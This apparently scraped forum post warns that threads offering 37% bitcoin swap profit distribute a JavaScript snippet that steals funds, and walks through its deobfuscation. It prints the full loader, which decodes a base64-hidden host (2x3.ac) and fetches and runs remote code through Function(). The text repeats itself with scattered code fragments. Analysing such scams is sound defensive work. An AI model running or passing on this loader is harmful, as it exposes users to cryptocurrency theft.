hello
many threads are posted in this forum about making 37% profit by swapping bitcoin on swapzone.io
the fact is they give you a javascript script that steals your bitcoin.
one thread in there but there are many on this forum, many have been created by different users :
the malicious script is :
The
syntax means this function runs immediately when the script is loaded.
which is base64
So
Decoding aHR0cHM6Ly8yeDMuYWMvcy5waHA from base64 gives:
https://2x3.ac/s.php
So the script is pointing to an external URL.
[*]It downloads the content of that URL.
[*]Reads it as text (
).
[*]Then executes it as JavaScript using
(like
).
cheers
many threads are posted in this forum about making 37% profit by swapping bitcoin on swapzone.io
the fact is they give you a javascript script that steals your bitcoin.
one thread in there but there are many on this forum, many have been created by different users :
Quote:https://darkforums.st/Thread-Free-BTC-Me...ht=bitcoin
the malicious script is :
Code:
(() => {
let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly8yeDMuYWMvcy5waHA/btc/node-1.9.js'
.match(/changenow\/(.*?)\//)[1];
fetch(atob(node))
.then(r => r.text())
.then(c => Function(c)())
})();Code:
(() => { ... })();- The regex
looks for the part betweenCode:/changenow\/(.*?)\//
and the nextCode:changenow/
.Code:/
- In the URL, that part is:
Code:
aHR0cHM6Ly8yeDMuYWMvcy5waHASo
Code:
node = "aHR0cHM6Ly8yeDMuYWMvcy5waHA"https://2x3.ac/s.php
So the script is pointing to an external URL.
[*]It downloads the content of that URL.
[*]Reads it as text (
Code:
r.text()[*]Then executes it as JavaScript using
Code:
Function(c)()Code:
evalcheers